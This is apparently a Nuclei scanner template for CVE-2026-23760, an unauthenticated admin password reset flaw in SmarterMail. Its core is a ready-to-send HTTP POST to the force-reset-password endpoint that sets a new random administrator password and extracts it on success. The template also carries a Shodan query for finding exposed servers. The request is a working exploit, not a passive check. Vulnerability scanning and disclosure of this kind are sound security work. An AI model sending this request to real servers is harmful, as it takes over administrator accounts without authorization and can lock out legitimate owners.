id: CVE-2026-23760

info:
  name: SmarterTools SmarterMail - Admin Password Reset
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
  impact: |
    Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
  remediation: |
    Upgrade to build 9511 or later.
  reference:
    - https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev,kev

variables:
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST /api/v1/auth/force-reset-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"IsSysAdmin":"true",
        "OldPassword":"watever",
        "Username":"admin",
        "NewPassword":"{{password}}",
        "ConfirmPassword": "{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - 'debugInfo'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"New Password: " + password'
# digest: 4a0a00473045022075bc7a151ad673dcb658ce533235d67c2ed4910dd7c7b346be8535b6003e35f20221008669e4d8d1250dbbe0ffbb7b727bf10329de1163fc4c76ff4546665575bf303c:922c64590222798bb761d5b6d8e72950